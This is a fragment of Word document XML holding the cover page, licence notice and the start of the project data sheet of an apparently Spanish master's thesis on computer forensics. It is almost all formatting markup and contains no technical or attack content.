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317FF2" w14:textId="77777777" w:rsidR="002B0318" w:rsidRPr="00490E1A" w:rsidRDefault="002B0318" w:rsidP="00D35B5E">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk155010525"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10490" w:type="dxa"/>
        <w:tblInd w:w="-751" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3544"/>
        <w:gridCol w:w="6946"/>
      </w:tblGrid>
      <w:tr w:rsidR="00705474" w:rsidRPr="00490E1A" w14:paraId="35B466B4" w14:textId="77777777" w:rsidTr="00C86658">
        <w:trPr>
          <w:trHeight w:val="2652"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10490" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="73EDFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="60063D88" w14:textId="77777777" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D18A665" w14:textId="5BDD622D" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="00AF2B15" w:rsidP="00C86658">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490E1A">
              <w:rPr>
                <w:b/>
                <w:color w:val="000078"/>
                <w:sz w:val="100"/>
                <w:szCs w:val="100"/>
              </w:rPr>
              <w:t>Análisis forense de un ordenador.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00705474" w:rsidRPr="00490E1A" w14:paraId="564FE06A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10490" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="64D4E486" w14:textId="77777777" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00705474" w:rsidRPr="00490E1A" w14:paraId="14F651C0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="51612663" w14:textId="1C0B9E76" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="00DE1836">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490E1A">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="217046FC" wp14:editId="5F38AB2C">
                  <wp:extent cx="2143125" cy="5372100"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="588290985" name="image2.png"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Shape, rectang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3691" t="-481" r="-1747" b="-481"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2143125" cy="5372100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6946" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="170A82AD" w14:textId="1727F381" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="004A0AA2" w:rsidP="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490E1A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>José Enrique Rodríguez González.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E854C83" w14:textId="47A783D8" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="004A0AA2" w:rsidP="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490E1A">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>M1.881 - TFM - Análisis forense</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337D69A9" w14:textId="77777777" w:rsidR="00C86658" w:rsidRDefault="00C86658" w:rsidP="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1870B1A3" w14:textId="6BD3B2C0" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="00705474" w:rsidP="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490E1A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>Nombre Tutor/a de TF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E9DAA4D" w14:textId="77777777" w:rsidR="004A0AA2" w:rsidRPr="00490E1A" w:rsidRDefault="004A0AA2" w:rsidP="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490E1A">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>Dña. Elena Botana de Castro.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AECB881" w14:textId="77777777" w:rsidR="00C86658" w:rsidRDefault="00C86658" w:rsidP="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E99F94E" w14:textId="6D4B4040" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="00705474" w:rsidP="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490E1A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>Profesor/a responsable de la asignatura</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23FE0BD7" w14:textId="06015245" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="004A0AA2" w:rsidP="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490E1A">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>D. Jordi Serra Ruiz.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D345EC" w14:textId="77777777" w:rsidR="00C86658" w:rsidRDefault="00C86658" w:rsidP="004A0AA2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CA0E964" w14:textId="666F245F" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="00705474" w:rsidP="004A0AA2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00490E1A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>Fecha Entrega</w:t>
            </w:r>
            <w:r w:rsidR="004A0AA2" w:rsidRPr="00490E1A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="004A0AA2" w:rsidRPr="00490E1A">
              <w:rPr>
                <w:b/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="004A0AA2" w:rsidRPr="00490E1A">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="42"/>
                <w:szCs w:val="42"/>
              </w:rPr>
              <w:t>Enero de 2024</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DB507BB" w14:textId="77777777" w:rsidR="004A0AA2" w:rsidRPr="00490E1A" w:rsidRDefault="004A0AA2" w:rsidP="00705474">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:ind w:left="283"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48AAEACC" w14:textId="77777777" w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidRDefault="00705474" w:rsidP="00705474">
      <w:pPr>
        <w:sectPr w:rsidR="00705474" w:rsidRPr="00490E1A" w:rsidSect="00B93CA3">
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:footerReference w:type="even" r:id="rId10"/>
          <w:footerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="first" r:id="rId12"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFE68DA" w14:textId="77777777" w:rsidR="00036D71" w:rsidRPr="00490E1A" w:rsidRDefault="00036D71" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E095DBE" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085E271B" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0EEB8F" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6FA1FF" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A66D55" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56BD2A79" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32134092" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A0E7FF" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F0FC00" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52006816" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A5F6E5" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFDA668" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E596F6" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DD112A" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE86222" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D097F14" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605CFC1A" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A40697A" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441B6D13" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B344020" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8CFDBD" w14:textId="77777777" w:rsidR="00483488" w:rsidRPr="00490E1A" w:rsidRDefault="00483488" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58AE7D22" w14:textId="77777777" w:rsidR="00B144D2" w:rsidRPr="00490E1A" w:rsidRDefault="00B144D2" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390370B2" w14:textId="77777777" w:rsidR="00B144D2" w:rsidRPr="00490E1A" w:rsidRDefault="00B144D2" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5407335B" w14:textId="77777777" w:rsidR="00036D71" w:rsidRPr="00490E1A" w:rsidRDefault="00036D71" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334A09F8" w14:textId="77777777" w:rsidR="00036D71" w:rsidRPr="00490E1A" w:rsidRDefault="00036D71" w:rsidP="00036D71">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6D35C0" w14:textId="791C5B32" w:rsidR="003446CE" w:rsidRPr="00F149F6" w:rsidRDefault="00DE1836" w:rsidP="003446CE">
      <w:pPr>
        <w:ind w:right="3438"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490E1A">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B5FEC37" wp14:editId="248B4B30">
            <wp:extent cx="1198091" cy="422055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="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4934" cy="435034"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003446CE" w:rsidRPr="00490E1A">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Arial"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003446CE" w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Esta obra está sujeta a una licencia de Reconocimiento-NoComercial-SinObraDerivada </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="003446CE" w:rsidRPr="00F149F6">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:eastAsia="MS Mincho"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>3.0 España de Creative Commons</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D2D3243" w14:textId="77777777" w:rsidR="006931A4" w:rsidRPr="00490E1A" w:rsidRDefault="006931A4" w:rsidP="00B144D2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2400"/>
          <w:tab w:val="center" w:pos="4252"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:sectPr w:rsidR="006931A4" w:rsidRPr="00490E1A" w:rsidSect="00B93CA3">
          <w:headerReference w:type="first" r:id="rId15"/>
          <w:footerReference w:type="first" r:id="rId16"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49EE2DCD" w14:textId="77777777" w:rsidR="00481598" w:rsidRPr="00F149F6" w:rsidRDefault="00A62A17" w:rsidP="00B144D2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2400"/>
          <w:tab w:val="center" w:pos="4252"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FICHA DEL TRABAJO FINAL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32"/>
        <w:gridCol w:w="4827"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A62A17" w:rsidRPr="00F149F6" w14:paraId="59CDE11A" w14:textId="77777777" w:rsidTr="00D16863">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
